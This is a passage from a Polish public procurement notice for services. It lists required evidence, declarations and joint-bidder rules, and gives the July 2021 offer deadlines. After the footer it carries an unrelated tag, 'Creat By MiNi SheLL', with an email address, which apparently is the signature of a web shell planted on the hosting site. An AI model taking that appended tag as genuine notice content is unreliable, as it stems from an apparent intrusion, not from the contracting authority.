nr 5 do SWZ.<br/> 4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1. w zakresie potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami- załącznik nr 6 (6.1 dot. części I, 6.2 dot. części II) do SWZ;<br/>2) wykaz narzędzi wyposażenia zakładu i urządzeń technicznych, dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi zasobami, przygotowany zgodnie ze wzorem stanowiącym załącznik nr 7 (7.1 dot. części I, 7.2 dot. części II) do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty stanowiące ofertę, które należy złożyć: <br/>1) Formularz ofertowy + formularz cenowy, <br/>2) OŚWIADCZENIA [art. 273 ust. 1 i ust. 2 w zw z art. 125 ust 1 ustawy pzp].<br/>a) oświadczenie o spełnianiu warunków udziału w postępowaniu składane na podstawie art. 125 ust. 1 ustawy Pzp w związku z art. 273 ust. 1 i ust. 2 ustawy Pzp - którego wzór stanowiące załącznik nr 2 do SWZ - w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o spełnieniu warunków udziału w postępowaniu składa ich pełnomocnik wykonawców lub każdy z wykonawców;<br/>b) oświadczenie o niepodleganiu wykluczeniu na podstawie art. 108 ust. 1 pkt 1 – 6 oraz art. 109 ust. 1 pkt 4 ustawy pzp - którego wzór stanowi załącznik nr 3 do SWZ - w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o niepodleganiu wykluczenia składa każdy z wykonawców;<br/>c) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa lit a) i lit. b), także oświadczenie podmiotu udostępniającego, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby [art. 266, art. 273 ust. 1 w zw z art. 125 ust 5 ustawy pzp] - odpowiednio załącznik nr 4 oraz 5 do SWZ.<br/>3) Pełnomocnictwo upoważniające do złożenia oferty, jeżeli ofertę składa pełnomocnik; <br/>4) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5) Zobowiązanie podmiotu udostępniającego zasoby [art. 118 ust. 3 ustawy pzp].<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Uwaga: Dokument ma być złożony wraz z ofertą tylko w sytuacji gdy wykonawca powołuje się na zasoby innego podmiotu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. ŻadenzWykonawcówwspólnie<br/>ubiegających się o udzielenie zamówienia nie możepodlegaćwykluczeniu zpostępowania.W<br/>odniesieniu do warunków dotyczących wykształcenia,kwalifikacjizawodowychlub doświadczenia<br/>Wykonawcy wspólnie ubiegający się o udzieleniezamówieniamogą polegaćna zdolnościach tych<br/>Wykonawców, którzy wykonają robotybudowlane lub usługi,do realizacjiktórych te zdolności są<br/>wymagane. Wykonawcy wspólnieubiegający się oudzieleniezamówienia ponoszą solidarną<br/>odpowiedzialność zawykonanieumowy.OŚWIADCZENIA [art.273 ust. 1 i ust. 2 w zw z art. 125<br/>ust 1 ustawypzp].a)oświadczenie o spełnianiu warunkówudziału w postępowaniu - którego<br/>wzórstanowiącezałącznik nr 2 do SWZ - w przypadkuwspólnego ubiegania się o<br/>zamówienieprzezwykonawców, oświadczenie o spełnieniuwarunków udziału w postępowaniu<br/>składaichpełnomocnik wykonawców lub każdy zwykonawców ;b) oświadczenie<br/>oniepodleganiuwykluczeniu na podstawie art. 108 ust. 1 pkt 1 –6 oraz art. 109 ust. 1 pkt 4<br/>ustawypzp - któregowzór stanowi załącznik nr 3 do SWZ - wprzypadku wspólnego ubiegania się<br/>ozamówienie przezwykonawców, oświadczenie oniepodleganiu wykluczenia składa każdy<br/>zwykonawców; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-20 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-20 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-18</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-22 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com